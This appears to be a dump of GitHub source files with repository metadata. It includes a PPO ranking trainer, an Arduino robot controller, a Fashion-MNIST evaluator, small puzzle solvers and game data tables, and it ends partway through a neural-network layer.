+{"seq_id":"25127570152","text":"from __future__ import annotations\n\nimport pyarrow as pa\n\nfrom rerun.components import REGISTERED_COMPONENT_NAMES, ComponentTypeFactory\n\n__all__ = [\n \"DrawOrderArray\",\n \"DrawOrder\",\n]\n\n\nclass DrawOrderArray(pa.ExtensionArray): # type: ignore[misc]\n def splat(draw_order: float) -> DrawOrderArray: # type: ignore[misc]\n storage = pa.array([draw_order], type=DrawOrder.storage_type)\n return storage # type: ignore[no-any-return]\n\n\nDrawOrder = ComponentTypeFactory(\"DrawOrder\", DrawOrderArray, REGISTERED_COMPONENT_NAMES[\"rerun.draw_order\"])\n\npa.register_extension_type(DrawOrder())\n","repo_name":"yuancaimaiyi/rerun","sub_path":"rerun_py/rerun_sdk/rerun/components/draw_order.py","file_name":"draw_order.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"32895547632","text":"#extract snp info (pos, ref, alt) for joining to eqtl data\nimport itertools\nimport gzip\n\neqtl_anno = open(\"eqtl_anno.txt\", \"w\")\neqtl_anno.write(\"snps,pos_snps,ref,alt\\n\")\n#with gzip.open(\"test.vcf.gz\") as f:\nwith gzip.open(\"All_20180423.vcf.gz\") as f:\n for line in itertools.islice(f, 56, None): #skip first 56 lines (notes)\n snp_info = line.split(\"\\t\")\n (CHROM, POS, ID, REF, ALT) = snp_info[0:5] \n if len(REF) == 1 and len(ALT) == 1: #keep only SNPs, no indels\n eqtl_anno.write(ID + \",\" + POS + \",\" + REF + \",\" + ALT + \"\\n\")\neqtl_anno.close()\n","repo_name":"aandaleon/MESA_revisions","sub_path":"vcf_to_eqtl.py","file_name":"vcf_to_eqtl.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33497322237","text":"from Environment import Dataset, update_state\nfrom Evaluation import validate_individual, calculate\nfrom AgentPPO import Agent\nimport time\nfrom progress.bar import Bar\nimport numpy as np\nimport os\nimport pickle\nimport argparse\nimport torch\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\nfrom visualizer import visualize\n\ntorch.manual_seed(4)\nnp.random.seed(4)\nrandom.seed(4)\n\n\ndef train(model, data, t_steps, c1, c2):\n model.actor.train()\n model.critic.train()\n dcg_results = {}\n ts = time.time()\n bar = Bar('Training', max=len(data.getTrain()))\n episode_rewards_list = []\n epoch_avg_step_reward = 0\n for Q in data.getTrain():\n done = False\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n episode_reward = 0\n learn_iters = 0\n effective_length = min(t_steps, len(state)-1)\n for t in range(0, min(t_steps, len(state)-1)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action, prob, val = model.choose_action(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, reward = update_state(t, Q, state[action], state, data.getTruth())\n\n episode_reward += reward\n\n if t == min(t_steps-1, len(state)-2):\n done = True\n\n model.remember(data.getRelevance(Q, state), observation, action, prob, val, reward, done)\n\n\n # Update state\n state = state_\n\n model.learn(c1, c2)\n\n epoch_avg_step_reward += episode_reward / effective_length\n episode_rewards_list.append(episode_reward / effective_length)\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n bar.next()\n\n bar.finish()\n print(f'\\n Average step reward: {round(epoch_avg_step_reward / len(data.getTrain()), 4)}, time: {round(time.time() - ts)}')\n final_result = calculate(dcg_results)\n print(f\"NDCG@1: {final_result[0]}\\t\"\n f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result, episode_rewards_list\n\ndef train_init(model, data):\n model.actor.eval()\n model.critic.eval()\n score = 0\n dcg_results = {}\n ts = time.time()\n bar = Bar('Train', max=len(data.getTrain()))\n for Q in data.getTrain():\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n for t in range(0, len(state)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action = model.choose_action_test(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, _ = update_state(t, Q, state[action], state, data.getTruth())\n\n # Update state\n state = state_\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n bar.next()\n\n bar.finish()\n final_result = calculate(dcg_results)\n print(f\"NDCG@1: {final_result[0]}\\t\"\n f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result, [0]\n\ndef test(model, data):\n model.actor.eval()\n model.critic.eval()\n dcg_results = {}\n ts = time.time()\n bar = Bar('Testing', max=len(data.getTest()))\n for Q in data.getTest():\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n for t in range(0, len(state)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action = model.choose_action_test(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, _ = update_state(t, Q, state[action], state, data.getTruth())\n\n # Update state\n state = state_\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n bar.next()\n\n bar.finish()\n final_result = calculate(dcg_results)\n print(f\"NDCG@1: {final_result[0]}\\t\"\n f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result\n\n\ndef vali(model, data):\n model.actor.eval()\n model.critic.eval()\n score = 0\n dcg_results = {}\n ts = time.time()\n # bar = Bar('Validating', max=len(data.getVali()))\n for Q in data.getVali():\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n for t in range(0, len(state)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action = model.choose_action_test(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, _ = update_state(t, Q, state[action], state, data.getTruth())\n\n # Update state\n state = state_\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n # bar.next()\n\n # bar.finish()\n # print(f'\\n TotalReward: {round(np.array(score_history).mean(), 4)}, time: {round(time.time() - ts)}')\n final_result = calculate(dcg_results)\n # print(f\"NDCG@1: {final_result[0]}\\t\"\n # f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result\n\n\ndef pickle_data(data, output_file):\n output_handle = open(output_file, 'wb')\n pickle.dump(data, output_handle)\n output_handle.close()\n\ndef get_name(datadir):\n lst=datadir.split('/')\n ds=\"\"\n for i in lst:\n if('ohsumed' in i.lower()):\n ds='OHSUMED'\n elif('mq2008' in i.lower()):\n ds='MQ2008'\n elif('mq2007' in i.lower()):\n ds='MQ2007'\n elif('mslr-web10k' in i.lower()):\n ds='MSLR-WEB10K'\n if(len(ds)==0):\n print(\"Wrong Dataset,Please check path\")\n exit()\n else:\n return ds\n\nif __name__ == '__main__':\n # Taking arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-d\", \"--data\", required=True,\n help=\"relative or absolute directory of the directory where complete dictionary exists\")\n ap.add_argument(\"-f\", \"--fold\", required=True,\n help=\"Fold\")\n ap.add_argument(\"-i\", \"--iterations\", required=True,\n help=\"number of iterations to run for\")\n ap.add_argument(\"-nf\", \"--features_no\", required=True,\n help=\"number of features in the dataset\")\n ap.add_argument(\"-g\", \"--gamma\", required=False, default=1,\n help=\"Gamma value; default = 1\")\n ap.add_argument(\"-alpha\", \"--alpha\", required=False, default=0.0001,\n help=\"Learning rate of the actor \")\n ap.add_argument(\"-beta\", \"--beta\", required=False, default=0.0002,\n help=\"Learning rate of the critic \")\n ap.add_argument(\"-hnodes\", \"--hidden_layer_nodes\", required=False, default=45,\n help=\"Number of hidden nodes \")\n ap.add_argument(\"-steps\", \"--episode_length\", required=False, default=20,\n help=\"Number of steps to take in each episode\")\n ap.add_argument(\"-batch_size\", \"--mini_batch_size\", required=False, default=5,\n help=\"size of the mini batch\")\n ap.add_argument(\"-epochs\", \"--epochs\", required=False, default=1,\n help=\"epochs to optimize surrogate\")\n ap.add_argument(\"-clip\", \"--policy_clip\", required=False, default=0.1,\n help=\"clipping parameter\")\n ap.add_argument(\"-lambda\", \"--gae_lambda\", required=False, default=1.0,\n help=\"smoothing factor for gae\")\n ap.add_argument(\"-c1\", \"--VF_coef\", required=False, default=0.5,\n help=\"VF coef\")\n ap.add_argument(\"-c2\", \"--S_coef\", required=False, default=0.01,\n help=\"Entropy coef\")\n args = vars(ap.parse_args())\n\n # Initializing arguments\n data_dir = str(args[\"data\"])\n fold = int(args[\"fold\"])\n num_features = int(args[\"features_no\"])\n num_iterations = int(args[\"iterations\"])\n gamma = float(args[\"gamma\"])\n alpha_agent = float(args[\"alpha\"])\n beta_agent = float(args[\"beta\"])\n hidden_layers = int(args[\"hidden_layer_nodes\"])\n policyclip = float(args[\"policy_clip\"])\n gaelambda = float(args[\"gae_lambda\"])\n\n # Extra arguments for PPO\n T_steps = int(args[\"episode_length\"])\n batch_size = int(args[\"mini_batch_size\"])\n n_epochs = int(args[\"epochs\"])\n c1 = float(args[\"VF_coef\"])\n c2 = float(args[\"S_coef\"])\n\n all_data = data_dir + f'/Fold{fold}/'\n data_object = Dataset(all_data, num_features)\n\n agent = Agent(alpha=alpha_agent, beta=beta_agent, n_actions=1, batch_size=batch_size, n_epochs=n_epochs,\n input_dims=[num_features],\n data=data_object, policy_clip=policyclip, gae_lambda=gaelambda, nodes=hidden_layers)\n\n \n train_results = []\n vali_results = []\n test_results = []\n\n print(\"\\n--- Training Started ---\\n\")\n for i in range(0, num_iterations):\n print(f\"\\nIteration: {i + 1}\\n\")\n\n train_results.append(train(agent, data_object, T_steps, c1, c2))\n print()\n test_results.append(test(agent, data_object))\n print()\n vali_results.append(vali(agent, data_object))\n\n agent.save_models() \n\n filename = f\"./Result/{get_name(data_dir)}/train_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}_actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\"\n\n pickle_data(train_results, filename)\n \n pickle_data(vali_results, f\"./Result/{get_name(data_dir)}/vali_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}__actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\")\n \n pickle_data(test_results,\n f\"./Result/{get_name(data_dir)}/test_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}_actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\")\n \n outfile = f\"./Result/{get_name(data_dir)}/plot_train_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}_actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\"\n\n visualize(train_results, outfile)","repo_name":"roshan1999/Information-Retrieval","sub_path":"PPORank/PPORank_Fold/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34280763129","text":"import os\n\nemails = set()\nfor dir in os.listdir(\"final_project/emails_by_address\"):\n s = dir.find(\"from_\")\n if s == -1:\n s = dir.find(\"to_\")\n e = dir.find(\"@\", s + 3)\n emails.add(dir[s + 3:e])\n else:\n e = dir.find(\"@\", s + 5)\n emails.add(dir[s + 5:e])\n\n with open(\"final_project/emails_by_address/\"+dir) as email:\n for line in email:\n s = line.find(\"maildir/\")\n e = line.find(\"/\", s+8)\n emails.add(line[s+8:e])\n\n\nprint(emails)\nprint(len(emails))","repo_name":"pr3mar/dh2016","sub_path":"unique_set.py","file_name":"unique_set.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42529621404","text":"'''\nArduino Control\n===============\n\nProvides a framework using pygame and pyserial\nfor serial control of an Arduino Robot.\n\nControl using the WASD keys.\n'''\n\nimport serial\nimport struct\nimport random\nimport time\nimport pygame\nimport sys\n\nclass Arduino():\n \"\"\"\n Represents an Arduino robot connected by USB.\n Allows user to send commands to the robot through a serial connection.\n \"\"\"\n\n def __init__(self, user_port='/dev/ttyACM0', user_baud=115200, user_timeout=1):\n \"\"\"\n Constructor for class Arduino\n \"\"\"\n\n self.connected = False\n self.ser = serial.Serial(user_port, user_baud, timeout=user_timeout)\n\n # valid commands: forward, backward, pivot right, pivot left, brake\n self.validCommands = ['f','b','r','l','s']\n\n # connect to the serial port\n self.connect()\n\n\n def sendCommand(self, command):\n \"\"\"\n Writes command to serial port to be read.\n Note that both command and the duration of the command must be encoded to bytes.\n \"\"\"\n\n self.ser.write(bytes(command.encode('utf-8')))\n\n # check if command is valid\n assert command in self.validCommands, \"%r is not a valid command\" % command\n\n # wait for Arduino to finish executing the command.\n while self.ser.read() == command:\n self.ser.read()\n\n\n def connect(self):\n \"\"\"\n Connect to Arduino through serial connection.\n Wait until response from Arduino.\n \"\"\"\n\n print(\"Connecting to port\", self.ser.port)\n\n while not self.connected:\n serin = self.ser.read()\n self.connected = True\n print(\"Connected!\")\n\n # self.calibrate()\n\n\n def disconnect(self):\n \"\"\"\n Disconnect in case of emergency.\n \"\"\"\n\n self.connected = False\n self.ser.close()\n\nif __name__ == '__main__':\n pygame.init()\n size = [800, 600]\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption('Arduino Control')\n robot = Arduino()\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a:\n robot.sendCommand('l')\n elif event.key == pygame.K_d:\n robot.sendCommand('r')\n elif event.key == pygame.K_w:\n robot.sendCommand('f')\n elif event.key == pygame.K_s:\n robot.sendCommand('b')\n elif event.key == pygame.K_ESCAPE:\n sys.exit(0)\n elif event.type == pygame.KEYUP:\n robot.sendCommand('s')","repo_name":"zhangxingshuo/py-robot","sub_path":"Arduino/arduino.py","file_name":"arduino.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28712909671","text":"n = input(\"enter number: \")\nn = int(n)\nincrease = start = 6 #28\nprime = []\nsum_divisors = 0\ncounter = 1\nwhile True:\n while counter < increase:\n if increase % counter == 0:\n sum_divisors += counter\n counter += 1\n else:\n counter += 1\n\n if increase == sum_divisors:\n prime = prime + [increase]\n increase += 1\n print(prime)\n else:\n # print(n, \"is not perfect\")\n increase += 1\n \n","repo_name":"tzvetandacov/Programming0","sub_path":"is_perfect.py","file_name":"is_perfect.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30286960479","text":"from enum import Enum\n\n#Resources = Enum('Resources', 'Saffron,Cinnamon,Vanilla,Clove,Ivory,Fine_Timber,Wool,Pelts,Cattle,Rice,Wheat,Iron,Gold,Silver')\n\nWood = [\"forest\", \"jungle\", \"low hills\", \"hills\", \"alpine\"]\n\nGrain = [\"grassland\", \"plains\"]\n\nWool = [\"shrubland\", \"grassland\", \"low hills\"]\n\nCattle = [\"grassland\", \"plains\"]\n\nFruit = [\"jungle\"]\n\nSaffron = [\"plains\", \"savannah\"]\n\nCinnamon = [\"plains\", \"savannah\", \"low hills\"]\n\nClove = [\"jungle\", \"low hills\"]\n\nIvory = [\"savannah\", \"ocean\"]\n\nShellfish = [\"shallows\", \"sea\", \"ocean\"]\n\nFish = [\"shallows\", \"sea\", \"lake\"]\n\nPelts = [\"taiga\", \"tundra\", \"snowpack\", \"ice\", \"low hills\", \"alpine\"]\n\n\nIron = [\n \"grassland\",\n \"taiga\",\n \"alpine\",\n \"plains\",\n \"low hills\",\n \"hills\",\n \"low mountains\",\n \"mountains\"]\n\nGold = [\n \"plains\",\n \"shrubland\",\n \"savannah\",\n \"low hills\",\n \"hills\",\n \"low mountains\",\n \"mountains\"]\n\nSilver = [\n \"grassland\",\n \"taiga\",\n \"alpine\",\n \"low hills\",\n \"hills\",\n \"low mountains\",\n \"mountains\"]\n\n\nJewels = [\n \"desert\",\n \"shrubland\",\n \"taiga\",\n \"low hills\",\n \"hills\"]\n\nrare_resources = [\"saffron\",\n \"cinnamon\",\n \"clove\",\n \"ivory\",\n \"pelts\",\n \"gold\",\n \"silver\",\n \"jewels\"]\n\n\ncommon_resources = [\"timber\",\n \"wool\",\n \"iron\"]\n\nfood_resources = [\"cattle\",\n \"wheat\",\n \"fruit\",\n \"fish\",\n \"shellfish\"]\n\nall_resources = food_resources + common_resources + rare_resources\n\nall_artikels = []\n\n\nmountain = {\"taiga\": [\"iron\", \"silver\", \"gold\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": [\"iron\", \"silver\", \"gold\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\nlow_mountain = {\"taiga\": [\"iron\", \"silver\", \"gold\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": [\"iron\", \"silver\", \"gold\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\nhill = {\"taiga\": [\"iron\", \"silver\", \"jewels\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": [\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\nlow_hill = {\"taiga\": [\"iron\", \"silver\", \"jewels\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": [\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\n\nvegetation = {\"taiga\": [\"wool\", \"pelts\", \"iron\", \"silver\"],\n \"tundra\": [\"pelts\", \"silver\"],\n \"snowy tundra\": [\"pelts\"],\n \"alpine\": [\"timber\", \"pelts\", \"iron\"],\n \"grassland\": [\"cattle\", \"wool\", \"wheat\", \"iron\", \"silver\"],\n \"plains\": [\"saffron\", \"cinnamon\", \"cattle\", \"wheat\"],\n \"wet plains\": [\"cinnamon\", \"cattle\", \"wheat\"],\n \"savannah\": [\"ivory\", \"cinnamon\", \"gold\"],\n \"desert\": [\"gold\", \"jewels\"],\n \"forest\": [\"timber\", \"pelts\"],\n \"conifer\": [\"timber\", \"pelts\"],\n \"jungle\": [\"clove\", \"timber\", \"fruit\"],\n \"snowpack\": [None],\n \"ice\": [None],\n \"shrubland\": [\"wool\", \"silver\", \"iron\", \"jewels\"],\n \"ocean\": [\"ivory\", \"fish\"],\n \"sea\": [\"fish\", \"shellfish\"],\n \"shallows\": [\"fish\", \"shellfish\"],\n \"lake\": [\"fish\"]}\n\nriver = {\"taiga\": [None],\n \"tundra\": [None],\n \"snowy tundra\": [None],\n \"alpine\": [None],\n \"grassland\": [None],\n \"plains\": [None],\n \"wet plains\": [None],\n \"savannah\": [None],\n \"desert\": [None],\n \"forest\": [None],\n \"conifer\": [None],\n \"jungle\": [None],\n \"snowpack\": [None],\n \"ice\": [None],\n \"shrubland\": [None],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\n\npossible_resources = {\"river\": river,\n \"vegetation\": vegetation,\n \"low hill\": low_hill,\n \"hill\": hill,\n \"low mountain\": low_mountain,\n \"mountain\": mountain}\n\n\nclass Resource(object):\n biomes_allowed = {}\n terrain_allowed = {}\n\n\nclass Artikel(object):\n\n biome_production = {}\n terrain_production = {}\n","repo_name":"z-van-baars/tradewinds","sub_path":"artikel.py","file_name":"artikel.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70750255734","text":"import os\nimport sys\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sklearn.metrics import accuracy_score\n\nmodel_path = '/content/Fashion-MNIST_sq.h5'\ntest_path = '/content/fashion_mnist_data/fashion-mnist_test.csv'\nmodel = keras.models.load_model(model_path)\n\ndef load_and_preprocess_test_data(test_folder):\n df = pd.read_csv(test_folder)\n y = df.iloc[:,0]\n X = df.iloc[:, 1: ]\n\n return X, y\n\ndef evaluate_model(model_path, test_path):\n correct_predictions = 0\n X, y = load_and_preprocess_test_data(test_path)\n total_examples = len(X)\n y_true = []\n y_pred = []\n\n # Iterate through all test examples\n for i in range(total_examples):\n test_example = X.iloc[i].to_numpy() # Get the feature values for the i-th test example\n test_example = test_example.reshape(1, 784) # Reshape for prediction\n\n # Make a prediction\n pred = model.predict(test_example)\n \n # Get the predicted class index\n predicted_class_index = np.argmax(pred[0])\n \n # Get the actual class label (ground truth)\n actual_class_label = y.iloc[i]\n y_pred.append(predicted_class_index)\n y_true.append(actual_class_label)\n\n \n\n # Calculate the accuracy\n accuracy = accuracy_score(y_true, y_pred)\n return accuracy\n\n\n\ndef main():\n # Parse command-line arguments\n parser = argparse.ArgumentParser(description=\"Model Evaluation\")\n parser.add_argument('--model_path', type=str, required=True, help=\"Path to the trained model\")\n parser.add_argument('--test_file', type=str, required=True, help=\"Path to the file containing test data\")\n args = parser.parse_args()\n\n model_path = args.model_path\n test_folder = args.test_file\n\n try:\n accuracy = evaluate_model(model_path, test_folder)\n # model_summary = model.summary()\n # model_summary = str(model_summary)\n accuracy = str(accuracy)\n\n # Create and write to the output.txt file\n with open('output.txt', 'w') as output_file:\n output_file.write(\"Model Architecture:\\n\")\n model_summary = model.summary(print_fn=lambda x: output_file.write(x + '\\n'))\n output_file.write(f\"Test Accuracy: {accuracy}\\n\")\n output_file.write(\"\\nAdditional Insights and observations:\\n\")\n output_file.write(\"\\n1. The dataset's remarkable class balance with approximately 7,000 samples\\nper class minimizes the risk of underfitting or overfitting,\\nensuring a robust foundation for model training.\\n\")\n output_file.write(\"\\n2. Reshaping the 784-pixel images was a crucial preprocessing step,\\nenhancing data compatibility and model training efficiency.\\n\")\n output_file.write(\"\\n3. Recognizing visually similar classes like pullovers, coats, and shirts\\ncan be challenging. In these cases, leveraging human expertise in a human-in-the-loop approach\\ncan improve model accuracy.\\n\")\n output_file.write(\"\\n4. Future work can focus on refining the model, integrating more features,\\nand further engaging human expertise to advance sustainable apparel classification.\\n\")\n print(\"Model evaluation completed. Results written to output.txt.\")\n except FileNotFoundError:\n print(\"Error: The provided folder doesn't exist or is empty.\")\n sys.exit(1)\n except Exception as e:\n print(f\"An error occurred: {str(e)}\")\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n\n\n\n","repo_name":"sasori-s/Fashion-MNIST","sub_path":"evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39798916324","text":"import itertools\ndef solution(baseball):\n answer = 0\n length = len(baseball)\n number = list(itertools.permutations([1, 2, 3, 4, 5, 6, 7, 8, 9], 3))\n for i in number:\n cnt = 0\n for v in baseball:\n string = str(v[0])\n tmp0, tmp1, tmp2 = int(string[0]), int(string[1]), int(string[2])\n strike = 0\n ball = 0\n if i[0] == tmp0:\n strike += 1\n if i[1] == tmp1:\n strike += 1\n if i[2] == tmp2:\n strike += 1\n if i[0] == tmp1 or i[0] == tmp2:\n ball += 1\n if i[1] == tmp0 or i[1] == tmp2:\n ball += 1\n if i[2] == tmp0 or i[2] == tmp1:\n ball += 1\n if strike == v[1] and ball == v[2]:\n cnt += 1\n else:\n break\n if cnt == length:\n answer += 1\n return answer\n\nbaseball = [[123, 1, 1], [356, 1, 0], [327, 2, 0], [489, 0, 1]]\nprint(solution(baseball))\n","repo_name":"cheol-95/Algorithm","sub_path":"Python/066. 숫자야구/Number Baseball.py","file_name":"Number Baseball.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14113677112","text":"#!/usr/bin/env python\nimport pika\n\nclass Sender():\n\n def send_msg(self, msg, name):\n connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\n channel = connection.channel()\n channel.queue_declare(queue=name)\n channel.basic_publish(exchange='',\n routing_key=name,\n body=msg)\n connection.close()\n","repo_name":"cperiz/trending_hashtags","sub_path":"lib/async_sender.py","file_name":"async_sender.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33468278307","text":"\n#Section2_1layerNN.py\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport math\n# load the images\n\ndef load_images():\n images = os.listdir('./data')\n X = []\n Y = np.load('label.npy')\n #load the images\n for i in range(1200):\n #The image is in shape(28,28,3) width=28, height=28, channel(RGB) = 3\n #R=G=B since the figure is gray\n image = cv2.imread('./data/%d.png'%(i+1)).astype('uint8')\n \n #Scale down(up) the figure so that it fit out model(input size: 20*20*1)\n image = cv2.resize(image,(20,20),interpolation=cv2.INTER_AREA)\n X.append(image)\n X = np.array(X)\n return X,Y\n\ndef one_hot(label):\n one_hot_label = [0]*26\n one_hot_label[label] = 1\n return one_hot_label \n\ndef load_data():\n X,Y = load_images()\n X = (X.sum(axis=3)//3)/255\n X = X.reshape(X.shape[0],-1) # convert each image into a col vecotr [50*50,1]\n Y = np.array(list(map(one_hot,Y)))\n return X,Y\n\n# utils.py\n# define the sigmoid activator and it's gradient (derivative) for backpropagation\nclass tanhActivator(object):\n def forward(self, weighted_input):\n return np.tanh(weighted_input)\n \n def backward(self, output):\n return 1-output**2\n \n#layer.py\n\nclass FullConnectedLayer():\n def __init__(self, input_size, output_size, \n activator):\n self.input_size = input_size\n self.output_size = output_size\n self.activator = activator\n self.W = np.random.uniform(-0.1, 0.1,\n (output_size, 